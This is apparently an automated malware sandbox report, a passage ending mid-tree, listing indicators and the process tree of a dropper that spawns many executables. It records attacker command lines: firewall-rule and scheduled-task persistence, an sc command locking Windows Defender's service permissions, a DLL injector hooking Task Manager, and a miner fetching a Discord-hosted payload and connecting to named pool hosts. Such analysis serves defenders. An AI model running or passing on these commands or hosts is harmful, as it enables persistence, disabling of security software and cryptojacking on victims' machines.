pid Process 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe -
Suspicious use of SetWindowsHookEx 37 IoCs
pid Process 9488 BroomSetup.exe 21000 OpenWith.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 11600 BroomSetup.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 17004 wrote to memory of 22124 17004 taskmgr.exe 74 PID 17004 wrote to memory of 22124 17004 taskmgr.exe 74 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 4044 wrote to memory of 17632 4044 file.exe 75 PID 17632 wrote to memory of 22060 17632 jsc.exe 78 PID 17632 wrote to memory of 22060 17632 jsc.exe 78 PID 17632 wrote to memory of 22060 17632 jsc.exe 78 PID 22060 wrote to memory of 21880 22060 aCVfJ427wn6CARWtL1GFkhK1.exe 79 PID 22060 wrote to memory of 21880 22060 aCVfJ427wn6CARWtL1GFkhK1.exe 79 PID 22060 wrote to memory of 21880 22060 aCVfJ427wn6CARWtL1GFkhK1.exe 79 PID 21880 wrote to memory of 4320 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 80 PID 21880 wrote to memory of 4320 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 80 PID 21880 wrote to memory of 4320 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 80 PID 21880 wrote to memory of 2184 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 81 PID 21880 wrote to memory of 2184 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 81 PID 21880 wrote to memory of 2184 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 81 PID 17632 wrote to memory of 688 17632 jsc.exe 82 PID 17632 wrote to memory of 688 17632 jsc.exe 82 PID 17632 wrote to memory of 688 17632 jsc.exe 82 PID 17632 wrote to memory of 3868 17632 jsc.exe 83 PID 17632 wrote to memory of 3868 17632 jsc.exe 83 PID 17632 wrote to memory of 3868 17632 jsc.exe 83 PID 3868 wrote to memory of 5968 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 84 PID 3868 wrote to memory of 5968 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 84 PID 3868 wrote to memory of 5968 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 84 PID 3868 wrote to memory of 9488 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 86 PID 3868 wrote to memory of 9488 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 86 PID 3868 wrote to memory of 9488 3868 ItyNfie1VMw2nLT7eTugtvYL.exe 86 PID 688 wrote to memory of 10796 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 87 PID 688 wrote to memory of 10796 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 87 PID 688 wrote to memory of 10796 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 87 PID 9488 wrote to memory of 11988 9488 BroomSetup.exe 89 PID 9488 wrote to memory of 11988 9488 BroomSetup.exe 89 PID 9488 wrote to memory of 11988 9488 BroomSetup.exe 89 PID 11988 wrote to memory of 2248 11988 cmd.exe 91 PID 11988 wrote to memory of 2248 11988 cmd.exe 91 PID 11988 wrote to memory of 2248 11988 cmd.exe 91 PID 11988 wrote to memory of 5448 11988 cmd.exe 92 PID 11988 wrote to memory of 5448 11988 cmd.exe 92 PID 11988 wrote to memory of 5448 11988 cmd.exe 92 PID 17632 wrote to memory of 12036 17632 jsc.exe 93 PID 17632 wrote to memory of 12036 17632 jsc.exe 93 PID 17632 wrote to memory of 12036 17632 jsc.exe 93 PID 12036 wrote to memory of 13676 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 94 PID 12036 wrote to memory of 13676 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 94 PID 12036 wrote to memory of 13676 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 94 PID 12036 wrote to memory of 14428 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 95 PID 12036 wrote to memory of 14428 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 95 PID 12036 wrote to memory of 14428 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 95 PID 12036 wrote to memory of 14960 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 96 PID 12036 wrote to memory of 14960 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 96 PID 12036 wrote to memory of 14960 12036 CkelNmqDwew6WPNzMTNOQeqx.exe 96 PID 14960 wrote to memory of 15204 14960 CkelNmqDwew6WPNzMTNOQeqx.exe 97 PID 14960 wrote to memory of 15204 14960 CkelNmqDwew6WPNzMTNOQeqx.exe 97 PID 14960 wrote to memory of 15204 14960 CkelNmqDwew6WPNzMTNOQeqx.exe 97 PID 19500 wrote to memory of 19904 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 101 PID 19500 wrote to memory of 19904 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 101 PID 19500 wrote to memory of 19904 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:17632 -
C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:22060 -
C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp"C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp" /SL5="$502CA,1807550,56832,C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:21880 -
C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe"C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i5⤵
- Executes dropped EXE
PID:4320
-
-
C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe"C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s5⤵
- Executes dropped EXE
PID:2184
-
-
-
-
C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:10796
-
-
C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:19500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:19904
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2496
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4416
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:17488
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:20712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:21576
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5448
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:12268
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:12156
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:10676
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:22252
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:21464
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:21240 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:9936
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:9824
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:806⤵
- Executes dropped EXE
PID:6200
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6284
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe6⤵
- Executes dropped EXE
PID:8040
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:8112
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe6⤵
- Executes dropped EXE
PID:1888
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:14436
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5148
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:13948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:9424
-
-
-
-
-
C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe"C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5968 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"5⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:20248 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe7⤵PID:20056
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:1852
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:9488 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:11988 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:5448
-
-
-
-
-
C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe"C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:12036 -
C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exeC:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6db421c8,0x6db421d4,0x6db421e04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:13676
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:14428
-
-
C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe"C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=12036 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240312130803" --session-guid=52c5fd4c-d793-4139-a592-fdb3e1102c9d --server-tracking-blob=NGY3YmU5NTI4YWVmYjM2MTM2M2RjN2VjZTVmNTYwOWYwOTA3Mzg4ZDZhNmZmNWNjYTFhNWRmNmE0NGE4NTVhMzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDI0ODg3NS4yMzI5IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3ZDY2NzEyZS00ZmNjLTQ0ODYtOWFmZi1jZjYxYzc4OGQ5MGYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=50040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:14960 -
C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exeC:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2cc,0x6d0321c8,0x6d0321d4,0x6d0321e05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:15204
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:6864
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:11556 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x200040,0x20004c,0x2000585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:15312
-
-
-
-
C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:10020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
PID:9812
-
-
C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:20496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:7828
-
-
-
-
C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe"C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:11644 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
PID:11796
-
-
-
C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"3⤵
- Executes dropped EXE
PID:13620 -
C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp"C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp" /SL5="$404DC,1807550,56832,C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:13736 -
C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe"C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i5⤵
- Executes dropped EXE
PID:13360
-
-
C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe"C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s5⤵
- Executes dropped EXE
PID:13392
-
-
-
-
C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe"C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:13668 -
C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exeC:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x69bc21c8,0x69bc21d4,0x69bc21e04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:13716
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:13848
-
-
-
C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:6012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
-
-
C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"3⤵
- Executes dropped EXE
PID:4700 -
